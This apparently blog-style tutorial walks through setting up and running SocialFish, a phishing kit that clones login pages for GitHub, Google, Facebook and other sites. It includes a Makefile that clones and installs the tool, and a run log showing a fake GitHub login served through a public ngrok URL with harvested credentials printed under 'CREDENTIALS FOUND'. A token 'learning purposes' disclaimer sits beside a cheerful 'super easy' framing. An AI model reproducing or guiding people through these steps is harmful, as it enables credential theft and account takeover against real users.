Create phishing sites with SocialFish

With SocialFish you can easily and quickly create phishing sites. Of course, only for learning purposes! Here is a little tutorial to getting started.

Requirements

  • make, PHP, sudo
  • Python 2.7
  • Python PIP
  • Python virtualenv

Preparation

# create new project
$ mkdir -p ~/Projects/SocialFish && cd ~/Projects/SocialFish

# create Makefile
$ vim Makefile
VIRTUALENV_DIR = .env

.PHONY: destroy

CURRENT_DIR := $(shell pwd)
INTERPRETER = $(CURRENT_DIR)/$(VIRTUALENV_DIR)/bin
PATH := ${PATH}:$(INTERPRETER)/

help :
	@echo "Usage: $ make <target>"
	@echo " > create    : create project"
	@echo " > run       : run project"
	@echo " > destroy   : destroy project"

create :
	@echo "[RUN]: clone from git"
	@git clone https://github.com/UndeadSec/SocialFish.git
	@make env

destroy :
	@echo "[RUN]: destroy project"
	@rm -fr ./$(VIRTUALENV_DIR)/
	@rm -fr ./SocialFish/

env :
	@echo "[RUN]: create virtualenv"
	@virtualenv $(VIRTUALENV_DIR) && \
	. $(VIRTUALENV_DIR)/bin/activate
	@make deps

deps :
	@echo "[RUN]: install dependencies"
	@$(INTERPRETER)/pip install -r $(CURRENT_DIR)/SocialFish/requirements.txt

run :
	@echo "[RUN]: start SocialFish"
	@cd SocialFish && \
	../.env/bin/python SocialFish.py

Usage

Here an phishing example for GitHub.

# download and create
$ make create

# start SocialFish
$ make run

 [!] Do you agree to use this tool for educational purposes only? (y/n)
 SF > y

Select an option:

 [1] Facebook

 [2] Google

 [3] LinkedIn

 [4] Github

 [5] StackOverflow

 [6] WordPress

 [7] Twitter

 SF >  4


   _.-=-._     .-, 
 .'       "-.,' / 
(          _.  < 
 `=.____.="  `._\


 [*] Github module loaded. Building site...
Password:

 [*] Ngrok URL: https://5cf8cc89.ngrok.io

 [*] Waiting for credentials... 

PHP 7.1.7 Development Server started at Sun Feb 18 16:11:23 2018
Listening on http://127.0.0.1:80
Document root is /Users/lupin/Projects/SocialFish/SocialFish/Server/www
Press Ctrl-C to quit.

SocialFish

[Sun Feb 18 16:13:06 2018] 127.0.0.1:50603 [200]: /
[Sun Feb 18 16:13:07 2018] 127.0.0.1:50612 [404]: /opensearch.xml - No such file or directory
[Sun Feb 18 16:13:18 2018] 127.0.0.1:50618 [302]: /login.php
 [ CREDENTIALS FOUND ]:
 [EMAIL]: test@mail.de [PASS]: test1234

# destroy all
$ make destroy

😉 super easy …